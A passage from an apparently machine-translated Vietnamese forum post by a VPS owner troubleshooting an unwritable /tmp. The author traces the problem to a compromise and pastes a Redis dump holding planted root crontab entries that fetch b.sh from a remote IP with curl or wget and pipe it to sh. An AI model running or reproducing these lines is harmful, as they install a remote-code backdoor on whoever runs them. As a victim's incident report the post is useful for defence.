Tôi không thể ghi vào thư mục/tmp.
Đây là người dùng không root:
europasprak@vps-xxxxxxxx:~$ echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Thao tác không được phép
và
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' | sudo tee /tmp/dummy
tee: /tmp/dummy: Thao tác không được phép
Cũng như người dùng root:
root@vps-xxxxxxxx:~# echo 'ok' > /tmp/dummy
bash: /tmp/dummy: Thao tác không được phép
Nó thậm chí còn từ chối trước khi (!) yêu cầu sudo mật khẩu mở khóa:
Lần đăng nhập cuối: Thứ tư ngày 18 tháng 8 19:38:33 năm 2021 từ 91.168.98.130
europasprak@vps-3506b083:~$ sudo echo 'ok' > /tmp/dummy2
-bash: /tmp/dummy2: Thao tác không được phép
Điều thú vị là nó từ chối đặt thời gian, với quyền root, trong lệnh này:
root@vps-xxxxxxxx:/home/europasprak# touch /tmp/ok
chạm: cài đặt thời gian của '/tmp/ok': Không có tệp hoặc thư mục như vậy
Vấn đề xuất hiện sáng nay.
Máy là:
europasprak@vps-xxxxxxxx:~$ uname -a
Linux vps-xxxxxxxx 5.8.0-63-generic #71-Ubuntu SMP Thứ ba ngày 13 tháng 7 15:59:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Các phân vùng:
europasprak@vps-xxxxxxxx:~$ df
Hệ thống tập tin Khối 1K Được sử dụng Có sẵn Sử dụng% Được gắn trên
tmpfs 795424 1072 794352 1%/lần chạy
/dev/sda1 162420480 59362024 103042072 37%/
tmpfs 3977116 0 3977116 0% /dev/shm
tmpfs 5120 0 5120 0%/chạy/khóa
tmpfs 4096 0 4096 0% /sys/fs/cgroup
/dev/sda15 106858 8008 98851 8%/boot/efi
lớp phủ 162420480 59362024 103042072 37% /home/europasprak/programs/install/docker/overlay2/2f1f82255bbd13b61ea151363e46880c4902b4b822fca15078fb9a10461111df/đã hợp nhất
europasprak@vps-xxxxxxxx:~$ df -i
Hệ thống tập tin Inodes IUsed IFree IUse% Mounted on
tmpfs 994279 640 993639 1%/lần chạy
/dev/sda1 20643840 523620 20120220 3%/
tmpfs 994279 4 994275 1%/dev/shm
tmpfs 994279 3 994276 1%/chạy/khóa
tmpfs 1024 18 1006 2% /sys/fs/cgroup
/dev/sda15 0 0 0 - /boot/efi
Một số đầu ra khác:
europasprak@vps-xxxxxxxx:~$ ls -ld /tmp
drwxrwxrwt 12 root root 4096 août 18 05:45 /tmp
europasprak@vps-xxxxxxxx:~$ lsattr /tmp
--------------e------ /tmp/dump.rdb
lsattr: Quyền bị từ chối Trong khi đọc cờ trên /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-timesyncd.service-11J2sh
lsattr: Quyền bị từ chối Trong khi đọc cờ trên /tmp/tmp.40xGrsPHCk
--------------e------ /tmp/exp_lin.so
--------------e------ /tmp/oi_plugins.php
--------------e------ /tmp/backup.db
lsattr: Quyền bị từ chối Trong khi đọc cờ trên /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-logind.service-ffm01g
lsattr: Quyền bị từ chối Trong khi đọc cờ trên /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-resolved.service-E7ECGg
--------------e------ /tmp/xm4.tgz
lsattr: Quyền bị từ chối trong khi đọc cờ trên /tmp/snap.lxd
CẬP NHẬT: Tôi đã thử cài đặt acl nhưng thất bại rõ ràng:
europasprak@vps-xxxxxxxx:~$ sudo apt cài đặt acl
Đang đọc danh sách gói... Error!
E: Không thể mkstemp /tmp/clearsigned.message.VjQNL9 - GetTempFile (1: Thao tác không được phép)
E: Không thể phân tích hoặc mở danh sách gói hoặc tệp trạng thái.
europasprak@vps-xxxxxxxx:~$ Sudo apt update
Err:1 http://security.ubuntu.com/ubuntu groovy-security InRelease
Lỗi tạm thời khi giải quyết 'security.ubuntu.com'
Err:2 https://download.docker.com/linux/ubuntu Groovy InRelease
Lỗi tạm thời khi giải quyết 'download.docker.com'
Err:3 http://ppa.launchpad.net/ultradvorka/ppa/ubuntu Groovy InRelease
Lỗi tạm thời khi giải quyết 'ppa.launchpad.net'
Err:4 http://nova.clouds.archive.ubuntu.com/ubuntu groovy InRelease
Lỗi tạm thời khi giải quyết 'nova.clouds.archive.ubuntu.com'
Err:5 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-updates InRelease
Lỗi tạm thời khi giải quyết 'nova.clouds.archive.ubuntu.com'
Err:6 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-backports InRelease
Lỗi tạm thời khi giải quyết 'nova.clouds.archive.ubuntu.com'
Đang đọc danh sách gói... Error!
W: Không thể tìm nạp http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy/InRelease Lỗi tạm thời khi giải quyết 'nova.clouds.archive.ubuntu.com'
W: Không thể tìm nạp http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-updates/InRelease Lỗi tạm thời khi giải quyết 'nova.clouds.archive.ubuntu.com'
W: Không thể tìm nạp http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-backports/InRelease Lỗi tạm thời khi giải quyết 'nova.clouds.archive.ubuntu.com'
W: Không thể tìm nạp http://security.ubuntu.com/ubuntu/dists/groovy-security/InRelease Lỗi tạm thời khi giải quyết 'security.ubuntu.com'
W: Không thể tìm nạp https://download.docker.com/linux/ubuntu/dists/groovy/InRelease Lỗi tạm thời khi giải quyết 'download.docker.com'
W: Không thể tìm nạp http://ppa.launchpad.net/ultradvorka/ppa/ubuntu/dists/groovy/InRelease Lỗi tạm thời khi giải quyết 'ppa.launchpad.net'
W: Một số tệp chỉ mục không tải xuống được. Họ đã bị bỏ qua, hoặc những người thân cũ được sử dụng để thay thế.
E: Không thể mkstemp /tmp/clearsigned.message.cOHaS4 - GetTempFile (1: Thao tác không được phép)
E: Không thể phân tích hoặc mở danh sách gói hoặc tệp trạng thái.
CẬP NHẬT: Tôi cũng đã thử tắt một cài đặt nhưng không được:
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Thao tác không được phép
europasprak@vps-xxxxxxxx:~$ sudo sysctl fs.protected_regular=0
[sudo] mật khẩu cho europasprak:
fs.protected_regular = 0
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Thao tác không được phép
VPS là một phiên bản kvm:
europasprak@vps-xxxxxxxx:~$ sudo virt-what
kvm
CẬP NHẬT:
europasprak@vps-xxxxxxxx:~$ sudo journalctl --boot --priority=4
[sudo] mật khẩu cho europasprak:
-- Nhật ký bắt đầu vào Thứ Năm 2021-04-01 18:46:32 UTC, kết thúc vào Chủ Nhật 2021-08-22 13:54:48 UTC. --
août 20 20:52:46 vps-3506b083 kernel: #2
août 20 20:52:46 vps-3506b083 kernel: #3
août 20 20:52:46 vps-3506b083 kernel: acpi PNP0A03:00: không thể thêm thông tin MMCONFIG, không thể truy cập không gian cấu hình PCI mở rộng dưới cầu này.
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: EISA: Không thể cấp phát tài nguyên cho mainboard
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Không thể phân bổ tài nguyên cho khe EISA 1
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Không thể phân bổ tài nguyên cho khe EISA 2
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Không thể phân bổ tài nguyên cho khe EISA 3
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Không thể phân bổ tài nguyên cho khe EISA 4
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Không thể phân bổ tài nguyên cho khe EISA 5
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Không thể phân bổ tài nguyên cho khe EISA 6
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Không thể phân bổ tài nguyên cho khe EISA 7
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Không thể phân bổ tài nguyên cho khe EISA 8
août 20 20:52:46 vps-3506b083 kernel: sd 2:0:0:0: Đã xảy ra bật nguồn hoặc khởi động lại thiết bị
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/plymouth-start.service:17: Đơn vị được định cấu hình để sử dụng KillMode=none. Điều này không an toàn vì nó vô hiệu hóa>
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/dbus.service:12: Đơn vị được định cấu hình để sử dụng KillMode=none. Điều này không an toàn vì nó vô hiệu hóa systemd's>
août 20 20:52:46 vps-3506b083 systemd-udevd[413]: Không thể tắt WakeOnLan của ens3: Thao tác không được hỗ trợ
août 20 20:52:48 vps-3506b083 systemd-networkd[658]: /run/systemd/network/10-netplan-ens3.network: MTUBytes= trong phần [Link] và UseMTU= trong phần [DHCP] >
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minutes; trong khi đọc/etc/crontab
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minutes; trong khi đọc /etc/cron.d/zzh
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minutes; trong khi đọc /etc/cron.d/dog
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: đã nhận được hàng xóm cho liên kết '3' mà chúng tôi không biết, bỏ qua.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: đã nhận được hàng xóm cho liên kết '3' mà chúng tôi không biết, bỏ qua.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: đã nhận được hàng xóm cho liên kết '3' mà chúng tôi không biết, bỏ qua.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: đã nhận được hàng xóm cho liên kết '3' mà chúng tôi không biết, bỏ qua.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: đã nhận được hàng xóm cho liên kết '4' mà chúng tôi không biết, bỏ qua.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: đã nhận được hàng xóm cho liên kết '4' mà chúng tôi không biết, bỏ qua.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: đã nhận được hàng xóm cho liên kết '4' mà chúng tôi không biết, bỏ qua.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: đã nhận được hàng xóm cho liên kết '4' mà chúng tôi không biết, bỏ qua.
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: testvxlan: Không nhận được cấu hình liên kết: Không có thiết bị như vậy
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vx-001000-z6tjy: Không nhận được cấu hình liên kết: Không có thiết bị như vậy
août 20 20:52:53 vps-3506b083 systemd-udevd[413]: vethe97279b: Không thể tạo MAC liên tục: Không có dữ liệu
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vethe514997: Không thể tạo MAC liên tục: Không có dữ liệu
août 20 20:52:53 vps-3506b083 systemd-networkd[658]: vethe97279b: Không đợi giao diện được khởi chạy: Không có thiết bị như vậy
europasprak@vps-3506b083:~$
CẬP NHẬT: Tôi có thể thấy tệp /etc/crontab của mình đã được chỉnh sửa. Hệ thống của tôi đã bị hack. Thật kỳ lạ, dường như không có bất kỳ hoạt động khai thác nào đang diễn ra. Tôi nghĩ rằng tôi cần phải cài đặt lại toàn bộ hệ thống.
REDIS0006þ^@^@^Gbackup3Ã@Q@X^G
*/4 *Â ^A^_root curl -fsSL http://199.19.22^T6.117/b2f628fff19fda9Ã^@^K/b.sh | sh
^@^Gbackup1@F
*/2 * * * * root cd1 -fsSL http://199.19.226.117/b2f628/b.sh | sh
^@^Gbackup4Ã@Q@X^G
*/5 *Â ^A^_root wd1 -q -O- http://199.19.22^T6.117/b2f628fff19fda9Ã^@^K/b.sh | sh
^@^Gbackup2@H
*/3 * * * * root wget -q -O- http://199.19.226.117/b2f628/b.sh | sh
ÿWìðr<90><93>^Gæ
